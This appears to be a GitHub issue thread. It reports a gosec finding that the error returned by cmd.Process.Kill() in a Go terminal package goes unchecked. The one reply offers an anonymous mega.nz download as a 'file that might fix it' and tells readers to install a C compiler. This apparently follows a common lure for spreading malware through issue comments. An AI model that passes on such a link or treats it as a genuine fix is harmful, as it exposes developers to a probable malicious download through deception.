### ISSUE TITLE
Unhandled Error

### ISSUE THREAD

**Issue by sshaparenko** [sshaparenko/falcon#11]
[/home/runner/work/falcon/falcon/pkg/terminal/terminal.go:100] - G104 (CWE-703): Errors unhandled. (Confidence: HIGH, Severity: LOW)
    99: 		<-c
-> 100: 		cmd.Process.Kill()
    101: 		os.Exit(1)

**Comment by Andrez092** [comment]
This might help:This file might fix it

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
If you don't have the c compliator, install it.(gcc or clang)
